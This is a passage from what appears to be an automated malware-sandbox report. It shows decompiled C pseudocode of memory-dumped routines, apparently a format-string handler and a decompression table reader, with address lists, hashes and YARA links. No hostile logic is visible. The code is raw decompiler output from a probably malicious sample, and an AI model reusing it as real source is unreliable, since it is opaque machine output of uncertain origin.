				_t139 = _t54 - _t105;
				if(_t139 > 0) {
					_t97 = _t54 - 0x5a;
					__eflags = _t97;
					if(_t97 == 0) {
						_t56 = E0021425C(__ecx);
						goto L10;
					}
					_t98 = _t97 - 7;
					__eflags = _t98;
					if(_t98 == 0) {
						goto L30;
					}
					__eflags = _t98;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t56 = E0021461B(_t134, __eflags, _t102);
					goto L10;
				}
				if(_t139 == 0) {
					_push(1);
					goto L13;
				}
				if(_t54 == _t123) {
					goto L30;
				}
				if(_t54 == 0x43) {
					goto L17;
				}
				if(_t54 <= 0x44) {
					goto L11;
				}
				if(_t54 <= 0x47) {
					goto L30;
				}
				if(_t54 != 0x53) {
					goto L11;
				}
				goto L9;
			}












































          0x00213ee9
          0x00213ef1
          0x00213ef8
          0x00213efd
          0x00213eff
          0x00213f03
          0x00213f06
          0x00213f0a
          0x00213f0b
          0x00213f0e
          0x00213f7b
          0x00213f7e
          0x00213fcd
          0x00213fcd
          0x00213fd0
          0x00213f3c
          0x00213f3e
          0x00213f43
          0x00213f45
          0x00213feb
          0x00213fee
          0x00214134
          0x00214134
          0x00214136
          0x00214145
          0x00214145
          0x00213ff4
          0x00213ff9
          0x00213ffc
          0x00213fff
          0x00214003
          0x00214009
          0x0021400a
          0x0021400c
          0x00214036
          0x00214036
          0x0021403a
          0x0021403d
          0x00214047
          0x00214049
          0x0021404c
          0x0021404e
          0x00214054
          0x00214054
          0x00214056
          0x00214056
          0x00214059
          0x00214067
          0x00214067
          0x00214069
          0x0021406b
          0x0021406c
          0x0021406e
          0x00214074
          0x00214076
          0x00214077
          0x0021407c
          0x0021407f
          0x0021408d
          0x0021408d
          0x0021408f
          0x0021408f
          0x0021409a
          0x0021409c
          0x002140a1
          0x002140a1
          0x002140a4
          0x002140aa
          0x002140ac
          0x002140af
          0x002140bf
          0x002140c4
          0x002140c4
          0x002140d9
          0x002140de
          0x002140e1
          0x002140e6
          0x002140e9
          0x002140eb
          0x002140ed
          0x002140f0
          0x002140f3
          0x00214100
          0x00214105
          0x00214105
          0x002140f3
          0x0021410c
          0x00214111
          0x00214114
          0x00214119
          0x0021411c
          0x0021411e
          0x0021412b
          0x00214130
          0x0021411e
          0x00000000
          0x00214133
          0x00214083
          0x00214084
          0x00214087
          0x00000000
          0x00000000
          0x00214089
          0x00000000
          0x00214089
          0x00214070
          0x00214072
          0x00000000
          0x00000000
          0x00000000
          0x00214072
          0x0021405d
          0x0021405e
          0x00214061
          0x00000000
          0x00000000
          0x00214063
          0x00000000
          0x00214063
          0x00000000
          0x00214050
          0x00214041
          0x00214042
          0x00214045
          0x00000000
          0x00000000
          0x00000000
          0x00214045
          0x00214010
          0x00214013
          0x00214015
          0x00214020
          0x00214022
          0x0021402a
          0x0021402c
          0x0021402e
          0x00000000
          0x00000000
          0x00214030
          0x00214034
          0x00214034
          0x00000000
          0x00214034
          0x00214024
          0x00214019
          0x00214019
          0x0021401a
          0x00000000
          0x0021401a
          0x00214017
          0x00000000
          0x00214017
          0x00213f4b
          0x00213f4b
          0x00000000
          0x00213f4b
          0x00213fd7
          0x00213fd7
          0x00213fda
          0x00213fac
          0x00213fac
          0x00213fad
          0x00213faf
          0x00213fb1
          0x00000000
          0x00213fb1
          0x00213fdc
          0x00213fdf
          0x00000000
          0x00000000
          0x00213fe5
          0x00213f54
          0x00213f54
          0x00000000
          0x00213f54
          0x00213f80
          0x00213fc3
          0x00000000
          0x00213fc3
          0x00213f82
          0x00213f85
          0x00213fb8
          0x00213fba
          0x00000000
          0x00213fba
          0x00213f87
          0x00213f8a
          0x00213fa8
          0x00213fa8
          0x00213fa8
          0x00213fa8
          0x00000000
          0x00213fa8
          0x00213f8c
          0x00213f8f
          0x00213fa1
          0x00000000
          0x00213fa1
          0x00213f91
          0x00213f94
          0x00000000
          0x00000000
          0x00213f98
          0x00000000
          0x00213f98
          0x00213f10
          0x00000000
          0x00000000
          0x00213f16
          0x00213f18
          0x00213f58
          0x00213f58
          0x00213f5b
          0x00213f74
          0x00000000
          0x00213f74
          0x00213f5d
          0x00213f5d
          0x00213f60
          0x00000000
          0x00000000
          0x00213f63
          0x00213f66
          0x00000000
          0x00000000
          0x00213f68
          0x00213f6b
          0x00000000
          0x00213f6b
          0x00213f1a
          0x00213f52
          0x00000000
          0x00213f52
          0x00213f1e
          0x00000000
          0x00000000
          0x00213f27
          0x00000000
          0x00000000
          0x00213f2c
          0x00000000
          0x00000000
          0x00213f31
          0x00000000
          0x00000000
          0x00213f3a
          0x00000000
          0x00000000
          0x00000000

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 02cbe3250c2021e51a47e6eace4b1037676e5e27ed8fe358fd9626fb0128107f
          • Instruction ID: 9d87973afb6e597b20717d7061ede01a675151bf7da06f4c9147f8f148d8316f
          • Opcode Fuzzy Hash: 02cbe3250c2021e51a47e6eace4b1037676e5e27ed8fe358fd9626fb0128107f
          • Instruction Fuzzy Hash: 2C619971A3070A66CE38ED288851BFE23E6EB75704F10051AEA4FCB9C1D6519FF78651
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020397F, Relevance: .2, Instructions: 232COMMONCrypto
          Download Yara Rule
          C-Code - Quality: 72%
          			E0020397F(void* __ecx) {
				signed int _t71;
				signed int _t72;
				signed int _t73;
				signed int _t76;
				signed int _t77;
				signed int _t78;
				signed int _t90;
				signed int _t94;
				signed int _t109;
				intOrPtr* _t111;
				signed int _t114;
				intOrPtr _t115;
				signed int _t121;
				signed int _t124;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t135;
				signed int _t138;
				intOrPtr* _t139;
				intOrPtr* _t150;
				void* _t151;
				signed int _t154;
				unsigned int _t159;
				signed int _t162;
				signed int _t164;
				signed int _t165;
				intOrPtr* _t168;
				void* _t170;
				void* _t171;

				_t170 = __ecx;
				if( *((char*)( *((intOrPtr*)(_t171 + 8)) + 0x11)) != 0) {
					_t168 =  *((intOrPtr*)(_t171 + 0x1d8));
					__eflags =  *((char*)(_t168 + 8));
					if( *((char*)(_t168 + 8)) != 0) {
						L5:
						_t164 = 0;
						__eflags = 0;
						do {
							_t109 = E001FA4E8(_t168) >> 0x0000000c & 0x000000ff;
							E001FA4D1(_t168, 4);
							__eflags = _t109 - 0xf;
							if(_t109 != 0xf) {
								 *(_t171 + _t164 + 0x18) = _t109;
								goto L14;
							}
							_t124 = E001FA4E8(_t168) >> 0x0000000c & 0x000000ff;
							E001FA4D1(_t168, 4);
							__eflags = _t124;
							if(_t124 != 0) {
								_t125 = _t124 + 2;
								__eflags = _t125;
								while(1) {
									_t125 = _t125 - 1;
									__eflags = _t164 - 0x14;
									if(_t164 >= 0x14) {
										break;
									}
									 *(_t171 + _t164 + 0x18) = 0;
									_t164 = _t164 + 1;
									__eflags = _t125;
									if(_t125 != 0) {
										continue;
									}
									break;
								}
								_t164 = _t164 - 1;
								goto L14;
							}
							 *(_t171 + _t164 + 0x18) = 0xf;
							L14:
							_t164 = _t164 + 1;
							__eflags = _t164 - 0x14;
						} while (_t164 < 0x14);
						_push(0x14);
						_t111 =  *((intOrPtr*)(_t171 + 0x1e8)) + 0x3bb0;
						_push(_t111);
						_push(_t171 + 0x18);
						 *((intOrPtr*)(_t171 + 0x20)) = _t111;
						E00202C88();
						_t165 = 0;
						__eflags = 0;
						do {
							__eflags =  *((char*)(_t168 + 8));
							if( *((char*)(_t168 + 8)) != 0) {
								L19:
								_t71 = E001FA4ED(_t168);
								_t72 =  *(_t111 + 0x84);
								_t159 = _t71 & 0x0000fffe;
								__eflags = _t159 -  *((intOrPtr*)(_t111 + 4 + _t72 * 4));
								if(_t159 >=  *((intOrPtr*)(_t111 + 4 + _t72 * 4))) {
									_t131 = 0xf;
									_t73 = _t72 + 1;
									 *(_t171 + 0x10) = _t131;
									__eflags = _t73 - _t131;
									if(_t73 >= _t131) {
										L27:
										_t133 =  *(_t168 + 4) +  *(_t171 + 0x10);
										 *_t168 =  *_t168 + (_t133 >> 3);
										_t76 =  *(_t171 + 0x10);
										 *(_t168 + 4) = _t133 & 0x00000007;
										_t135 = 0x10;
										_t138 =  *((intOrPtr*)(_t111 + 0x44 + _t76 * 4)) + (_t159 -  *((intOrPtr*)(_t111 + _t76 * 4)) >> _t135 - _t76);
										__eflags = _t138 -  *_t111;
										asm("sbb eax, eax");
										_t77 = _t76 & _t138;
										__eflags = _t77;
										_t78 =  *(_t111 + 0xc88 + _t77 * 2) & 0x0000ffff;
										L28:
										__eflags = _t78 - 0x10;
										if(_t78 >= 0x10) {
											_t139 = _t168;
											__eflags = _t78 - 0x12;
											if(__eflags >= 0) {
												if(__eflags != 0) {
													_t114 = (E001FA4E8(_t139) >> 9) + 0xb;
													__eflags = _t114;
													_push(7);
												} else {
													_t114 = (E001FA4E8(_t139) >> 0xd) + 3;
													_push(3);
												}
												E001FA4D1(_t168);
												while(1) {
													_t114 = _t114 - 1;
													__eflags = _t165 - 0x1ae;
													if(_t165 >= 0x1ae) {
														goto L46;
													}
													 *(_t171 + _t165 + 0x2c) = 0;
													_t165 = _t165 + 1;
													__eflags = _t114;
													if(_t114 != 0) {
														continue;
													}
													L44:
													_t111 =  *((intOrPtr*)(_t171 + 0x14));
													goto L45;
												}
												break;
											}
											__eflags = _t78 - 0x10;
											if(_t78 != 0x10) {
												_t121 = (E001FA4E8(_t139) >> 9) + 0xb;
												__eflags = _t121;
												_push(7);
											} else {
												_t121 = (E001FA4E8(_t139) >> 0xd) + 3;
												_push(3);
											}
											E001FA4D1(_t168);
											__eflags = _t165;
											if(_t165 == 0) {
												L48:
												_t90 = 0;
												L50:
												L51:
												return _t90;
											} else {
												while(1) {
													_t121 = _t121 - 1;
													__eflags = _t165 - 0x1ae;
													if(_t165 >= 0x1ae) {
														goto L46;
													}
													 *(_t171 + _t165 + 0x2c) =  *((intOrPtr*)(_t171 + _t165 + 0x2b));
													_t165 = _t165 + 1;
													__eflags = _t121;
													if(_t121 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t171 + _t165 + 0x2c) = _t78;
										_t165 = _t165 + 1;
										goto L45;
									}
									_t150 = _t111 + (_t73 + 1) * 4;
									while(1) {
										__eflags = _t159 -  *_t150;
										if(_t159 <  *_t150) {
											break;
										}
										_t73 = _t73 + 1;
										_t150 = _t150 + 4;
										__eflags = _t73 - 0xf;
										if(_t73 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t171 + 0x10) = _t73;
									goto L27;
								}
								_t151 = 0x10;
								_t162 = _t159 >> _t151 - _t72;
								_t154 = ( *(_t162 + _t111 + 0x88) & 0x000000ff) +  *(_t168 + 4);
								 *_t168 =  *_t168 + (_t154 >> 3);
								 *(_t168 + 4) = _t154 & 0x00000007;
								_t78 =  *(_t111 + 0x488 + _t162 * 2) & 0x0000ffff;
								goto L28;
							}
							__eflags =  *_t168 -  *((intOrPtr*)(_t170 + 0x84)) - 5;
							if( *_t168 <=  *((intOrPtr*)(_t170 + 0x84)) - 5) {
								goto L19;
							}
							_t94 = E00204422(_t170);
							__eflags = _t94;
							if(_t94 == 0) {
								goto L48;
							}
							goto L19;
							L45:
							__eflags = _t165 - 0x1ae;
						} while (_t165 < 0x1ae);
						L46:
						 *((char*)(_t170 + 0xe662)) = 1;
						__eflags =  *((char*)(_t168 + 8));
						if( *((char*)(_t168 + 8)) != 0) {
							L49:
							_t115 =  *((intOrPtr*)(_t171 + 0x1e8));
							_push(0x132);
							_push(_t115);
							_push(_t171 + 0x2c);
							E00202C88();
							_push(0x40);
							_push(_t115 + 0xeec);
							_push(_t171 + 0x166);
							E00202C88();
							_push(0x10);
							_push(_t115 + 0x1dd8);
							_push(_t171 + 0x1a6);
							E00202C88();
							_push(0x2c);
							_push(_t115 + 0x2cc4);
							_push(_t171 + 0x1b6);
							E00202C88();
							_t90 = 1;
							goto L50;
						}
						__eflags =  *_t168 -  *((intOrPtr*)(_t170 + 0x84));
						if( *_t168 <=  *((intOrPtr*)(_t170 + 0x84))) {
							goto L49;
						}
						goto L48;
					}
					__eflags =  *_t168 -  *((intOrPtr*)(__ecx + 0x84)) - 0x19;
					if( *_t168 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
						goto L5;
					}
					_t90 = E00204422(__ecx);
					__eflags = _t90;
					if(_t90 == 0) {
						goto L51;
					}
					goto L5;
				}
				return 1;
			}

































          0x0020398e
          0x00203990
          0x0020399a
          0x002039a1
          0x002039a5
          0x002039c1
          0x002039c2
          0x002039c2
          0x002039c5
          0x002039d3
          0x002039d6
          0x002039db
          0x002039de
          0x00203a17
          0x00000000
          0x00203a17
          0x002039ee
          0x002039f1
          0x002039f6
          0x002039f8
          0x00203a01
          0x00203a01
          0x00203a04
          0x00203a04
          0x00203a05
          0x00203a08
          0x00000000
          0x00000000
          0x00203a0a
          0x00203a0f
          0x00203a10
          0x00203a12
          0x00000000
          0x00000000
          0x00000000
          0x00203a12
          0x00203a14
          0x00000000
          0x00203a14
          0x002039fa
          0x00203a1b
          0x00203a1b
          0x00203a1c
          0x00203a1c
          0x00203a2c
          0x00203a2e
          0x00203a36
          0x00203a37
          0x00203a38
          0x00203a3c
          0x00203a41
          0x00203a41
          0x00203a43
          0x00203a43
          0x00203a47
          0x00203a65
          0x00203a67
          0x00203a6e
          0x00203a74
          0x00203a7a
          0x00203a7e
          0x00203aab
          0x00203aac
          0x00203aad
          0x00203ab1
          0x00203ab3
          0x00203ace
          0x00203ad1
          0x00203add
          0x00203adf
          0x00203ae3
          0x00203ae8
          0x00203af4
          0x00203af6
          0x00203af8
          0x00203afa
          0x00203afa
          0x00203afc
          0x00203b04
          0x00203b04
          0x00203b07
          0x00203b13
          0x00203b15
          0x00203b18
          0x00203b62
          0x00203b7f
          0x00203b7f
          0x00203b82
          0x00203b64
          0x00203b6e
          0x00203b71
          0x00203b71
          0x00203b86
          0x00203b8b
          0x00203b8b
          0x00203b8c
          0x00203b92
          0x00000000
          0x00000000
          0x00203b94
          0x00203b99
          0x00203b9a
          0x00203b9c
          0x00000000
          0x00000000
          0x00203b9e
          0x00203b9e
          0x00000000
          0x00203b9e
          0x00000000
          0x00203b8b
          0x00203b1a
          0x00203b1d
          0x00203b3a
          0x00203b3a
          0x00203b3d
          0x00203b1f
          0x00203b29
          0x00203b2c
          0x00203b2c
          0x00203b41
          0x00203b46
          0x00203b48
          0x00203bc5
          0x00203bc5
          0x00203c2c
          0x00203c2e
          0x00000000
          0x00203b4a
          0x00203b4a
          0x00203b4a
          0x00203b4b
          0x00203b51
          0x00000000
          0x00000000
          0x00203b57
          0x00203b5b
          0x00203b5c
          0x00203b5e
          0x00000000
          0x00000000
          0x00000000
          0x00203b60
          0x00000000
          0x00203b4a
          0x00203b48
          0x00203b09
          0x00203b0d
          0x00000000
          0x00203b0d
          0x00203ab8
          0x00203abb
          0x00203abb
          0x00203abd
          0x00000000
          0x00000000
          0x00203abf
          0x00203ac0
          0x00203ac3
          0x00203ac6
          0x00000000
          0x00000000
          0x00000000
          0x00203ac8
          0x00203aca
          0x00000000
          0x00203aca
          0x00203a82
          0x00203a85
          0x00203a8f
          0x00203a97
          0x00203a9c
          0x00203a9f
          0x00000000
          0x00203a9f
          0x00203a52
          0x00203a54
          0x00000000
          0x00000000
          0x00203a58
          0x00203a5d
          0x00203a5f
          0x00000000
          0x00000000
          0x00000000
          0x00203ba2
          0x00203ba2
          0x00203ba2
          0x00203bae
          0x00203bae
          0x00203bb5
          0x00203bb9
          0x00203bc9
          0x00203bc9
          0x00203bd4
          0x00203bd9
          0x00203bda
          0x00203bdd
          0x00203be2
          0x00203bec
          0x00203bf4
          0x00203bf5
          0x00203bfa
          0x00203c04
          0x00203c0c
          0x00203c0d
          0x00203c12
          0x00203c1a
          0x00203c22
          0x00203c25
          0x00203c2a
          0x00000000
          0x00203c2a
          0x00203bbd
          0x00203bc3
          0x00000000
          0x00000000
          0x00000000
          0x00203bc3
          0x002039b0
          0x002039b2
          0x00000000
          0x00000000
          0x002039b4
          0x002039b9
          0x002039bb
          0x00000000
          0x00000000
          0x00000000
          0x002039bb
          0x00000000

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 1094cbaabbb87eae24529d212b46aee9e342c03f428bb804a3628aa9adfdf6f1
          • Instruction ID: e6a1462573cb2706da659c444f0033882b840f76abfc46a318fad34ea6152b50
          • Opcode Fuzzy Hash: 1094cbaabbb87eae24529d212b46aee9e342c03f428bb804a3628aa9adfdf6f1
          • Instruction Fuzzy Hash: 72714C713243468BDB34DF28C8D4B7D7798ABA1308F44492DEAC68B2C3CBB49A95C751
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00213CBA, Relevance: .2, Instructions: 214COMMONCrypto
          Download Yara Rule
          C-Code - Quality: 88%
          			E00213CBA(void* __ecx) {
				char _v6;
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t49;
				signed int _t50;
				void* _t51;
				signed char _t54;
				signed char _t56;
				signed int _t57;
				signed int _t58;
				signed char _t67;
				signed char _t69;
				signed char _t71;
				signed char _t80;
				signed char _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed char _t92;
				void* _t95;
				intOrPtr _t100;
				unsigned int _t102;
				signed char _t104;
				void* _t112;
				unsigned int _t113;
				void* _t114;
				signed int _t115;
				signed int* _t116;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_t119 = __ecx;
				_t92 = 1;
				_t49 =  *((char*)(__ecx + 0x31));
				_t124 = _t49 - 0x64;
				if(_t124 > 0) {
					__eflags = _t49 - 0x70;
					if(__eflags > 0) {
						_t50 = _t49 - 0x73;
						__eflags = _t50;
						if(_t50 == 0) {
							L9:
							_t51 = E002148A8(_t119);
							L10:
							if(_t51 != 0) {
								__eflags =  *((char*)(_t119 + 0x30));
								if( *((char*)(_t119 + 0x30)) == 0) {
									_t113 =  *(_t119 + 0x20);
									_push(_t114);
									_v8 = 0;
									_t115 = 0;
									_v6 = 0;
									_t54 = _t113 >> 4;
									__eflags = _t92 & _t54;
									if((_t92 & _t54) == 0) {
										L46:
										_t100 =  *((intOrPtr*)(_t119 + 0x31));
										__eflags = _t100 - 0x78;
										if(_t100 == 0x78) {
											L48:
											_t56 = _t113 >> 5;
											__eflags = _t92 & _t56;
											if((_t92 & _t56) != 0) {
												L50:
												__eflags = _t100 - 0x61;
												if(_t100 == 0x61) {
													L53:
													_t57 = 1;
													L54:
													__eflags = _t92;
													if(_t92 != 0) {
														L56:
														 *((char*)(_t121 + _t115 - 4)) = 0x30;
														__eflags = _t100 - 0x58;
														if(_t100 == 0x58) {
															L59:
															_t58 = 1;
															L60:
															__eflags = _t58;
															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
															_t115 = _t115 + 2;
															__eflags = _t115;
															L61:
															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
															__eflags = _t113 & 0x0000000c;
															if((_t113 & 0x0000000c) == 0) {
																E00213184(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
																_t122 = _t122 + 0x10;
															}
															E00214BA3(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
															_t102 =  *(_t119 + 0x20);
															_t116 = _t119 + 0x18;
															_t67 = _t102 >> 3;
															__eflags = _t67 & 0x00000001;
															if((_t67 & 0x00000001) != 0) {
																_t104 = _t102 >> 2;
																__eflags = _t104 & 0x00000001;
																if((_t104 & 0x00000001) == 0) {
																	E00213184(_t119 + 0x448, 0x30, _t95, _t116);
																	_t122 = _t122 + 0x10;
																}
															}
															E00214A71(_t95, _t119, _t116, _t119, 0);
															__eflags =  *_t116;
															if( *_t116 >= 0) {
																_t71 =  *(_t119 + 0x20) >> 2;
																__eflags = _t71 & 0x00000001;
																if((_t71 & 0x00000001) != 0) {
																	E00213184(_t119 + 0x448, 0x20, _t95, _t116);
																}
															}
															_t69 = 1;
															L70:
															return _t69;
														}
														__eflags = _t100 - 0x41;
														if(_t100 == 0x41) {
															goto L59;
														}
														_t58 = 0;
														goto L60;
													}
													__eflags = _t57;
													if(_t57 == 0) {
														goto L61;
													}
													goto L56;
												}
												__eflags = _t100 - 0x41;
												if(_t100 == 0x41) {
													goto L53;
												}
												_t57 = 0;
												goto L54;
											}
											L49:
											_t92 = 0;
											__eflags = 0;
											goto L50;
										}
										__eflags = _t100 - 0x58;
										if(_t100 != 0x58) {
											goto L49;
										}
										goto L48;
									}
									_t80 = _t113 >> 6;
									__eflags = _t92 & _t80;
									if((_t92 & _t80) == 0) {
										__eflags = _t92 & _t113;
										if((_t92 & _t113) == 0) {
											_t82 = _t113 >> 1;
											__eflags = _t92 & _t82;
											if((_t92 & _t82) == 0) {
												goto L46;
											}
											_v8 = 0x20;
											L45:
											_t115 = _t92;
											goto L46;
										}
										_v8 = 0x2b;
										goto L45;
									}
									_v8 = 0x2d;
									goto L45;
								}
								_t69 = _t92;
								goto L70;
							}
							L11:
							_t69 = 0;
							goto L70;
						}
						_t84 = _t50;
						__eflags = _t84;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t51 = E002146B3(_t119, _t114, __eflags);
							goto L10;
						}
						__eflags = _t84 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t51 = E00214890(__ecx);
						goto L10;
					}
					__eflags = _t49 - 0x67;
					if(_t49 <= 0x67) {
						L30:
						_t51 = E002142BF(_t92, _t119);
						goto L10;
					}
					__eflags = _t49 - 0x69;
					if(_t49 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t49 - 0x6e;
					if(_t49 == 0x6e) {
						_t51 = E002147FD(__ecx, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x6f;
					if(_t49 != 0x6f) {
						goto L11;
					}
					_t51 = E00214871(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t49 - 0x58;
				if(_t125 > 0) {
					_t86 = _t49 - 0x5a;
					__eflags = _t86;
					if(_t86 == 0) {
						_t51 = E002141F9(__ecx);
						goto L10;
					}
					_t87 = _t86 - 7;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L30;
					}
					__eflags = _t87;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t51 = E0021458B(_t92, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t49 == 0x41) {
					goto L30;
				}
				if(_t49 == 0x43) {
					goto L17;
				}
				if(_t49 <= 0x44) {
					goto L11;
				}
				if(_t49 <= 0x47) {
					goto L30;
				}
				if(_t49 != 0x53) {
					goto L11;
				}
				goto L9;
			}






































          0x00213cbf
          0x00213cc2
          0x00213cc6
          0x00213cc9
          0x00213ccd
          0x00213cd0
          0x00213d3e
          0x00213d41
          0x00213d90
          0x00213d90
          0x00213d93
          0x00213d00
          0x00213d02
          0x00213d07
          0x00213d09
          0x00213dae
          0x00213db2
          0x00213dbb
          0x00213dc0
          0x00213dc1
          0x00213dc5
          0x00213dc7
          0x00213dcc
          0x00213dcf
          0x00213dd1
          0x00213dfa
          0x00213dfa
          0x00213dfd
          0x00213e00
          0x00213e07
          0x00213e09
          0x00213e0c
          0x00213e0e
          0x00213e12
          0x00213e12
          0x00213e15
          0x00213e20
          0x00213e20
          0x00213e22
          0x00213e22
          0x00213e24
          0x00213e2a
          0x00213e2a
          0x00213e2f
          0x00213e32
          0x00213e3d
          0x00213e3d
          0x00213e3f
          0x00213e3f
          0x00213e4a
          0x00213e4e
          0x00213e4e
          0x00213e51
          0x00213e57
          0x00213e59
          0x00213e5c
          0x00213e6c
          0x00213e71
          0x00213e71
          0x00213e86
          0x00213e8b
          0x00213e8e
          0x00213e93
          0x00213e96
          0x00213e98
          0x00213e9a
          0x00213e9d
          0x00213ea0
          0x00213ead
          0x00213eb2
          0x00213eb2
          0x00213ea0
          0x00213eb9
          0x00213ebe
          0x00213ec1
          0x00213ec6
          0x00213ec9
          0x00213ecb
          0x00213ed8
          0x00213edd
          0x00213ecb
          0x00213ee0
          0x00213ee3
          0x00213ee8
          0x00213ee8
          0x00213e34
          0x00213e37
          0x00000000
          0x00000000
          0x00213e39
          0x00000000
          0x00213e39
          0x00213e26
          0x00213e28
          0x00000000
          0x00000000
          0x00000000
          0x00213e28
          0x00213e17
          0x00213e1a
          0x00000000
          0x00000000
          0x00213e1c
          0x00000000
          0x00213e1c
          0x00213e10
          0x00213e10
          0x00213e10
          0x00000000
          0x00213e10
          0x00213e02
          0x00213e05
          0x00000000
          0x00000000
          0x00000000
          0x00213e05
          0x00213dd5
          0x00213dd8
          0x00213dda
          0x00213de2
          0x00213de4
          0x00213dee
          0x00213df0
          0x00213df2
          0x00000000
          0x00000000
          0x00213df4
          0x00213df8
          0x00213df8
          0x00000000
          0x00213df8
          0x00213de6
          0x00000000
          0x00213de6
          0x00213ddc
          0x00000000
          0x00213ddc
          0x00213db4
          0x00000000
          0x00213db4
          0x00213d0f
          0x00213d0f
          0x00000000
          0x00213d0f
          0x00213d9a
          0x00213d9a
          0x00213d9d
          0x00213d6f
          0x00213d6f
          0x00213d70
          0x00213d72
          0x00213d74
          0x00000000
          0x00213d74
          0x00213d9f
          0x00213da2
          0x00000000
          0x00000000
          0x00213da8
          0x00213d17
          0x00213d17
          0x00000000
          0x00213d17
          0x00213d43
          0x00213d86
          0x00000000
          0x00213d86
          0x00213d45
          0x00213d48
          0x00213d7b
          0x00213d7d
          0x00000000
          0x00213d7d
          0x00213d4a
          0x00213d4d
          0x00213d6b
          0x00213d6b
          0x00213d6b
          0x00213d6b
          0x00000000
          0x00213d6b
          0x00213d4f
          0x00213d52
          0x00213d64
          0x00000000
          0x00213d64
          0x00213d54
          0x00213d57
          0x00000000
          0x00000000
          0x00213d5b
          0x00000000
          0x00213d5b
          0x00213cd2
          0x00000000
          0x00000000
          0x00213cd8
          0x00213cdb
          0x00213d1b
          0x00213d1b
          0x00213d1e
          0x00213d37
          0x00000000
          0x00213d37
          0x00213d20
          0x00213d20
          0x00213d23
          0x00000000
          0x00000000
          0x00213d26
          0x00213d29
          0x00000000
          0x00000000
          0x00213d2b
          0x00213d2e
          0x00000000
          0x00213d2e
          0x00213cdd
          0x00213d16
          0x00000000
          0x00213d16
          0x00213ce2
          0x00000000
          0x00000000
          0x00213ceb
          0x00000000
          0x00000000
          0x00213cf0
          0x00000000
          0x00000000
          0x00213cf5
          0x00000000
          0x00000000
          0x00213cfe
          0x00000000
          0x00000000
          0x00000000

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
          • Instruction ID: d1715c4b04ecfaaad4a4098f86496d4b755436c44aba3b5c167135a07cb3432b
          • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
          • Instruction Fuzzy Hash: 1E514560630B4657DB38DD28A4967FF6BCB9F32704F280519D846CB282C655DFF68352
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001FDADD, Relevance: .2, Instructions: 190COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
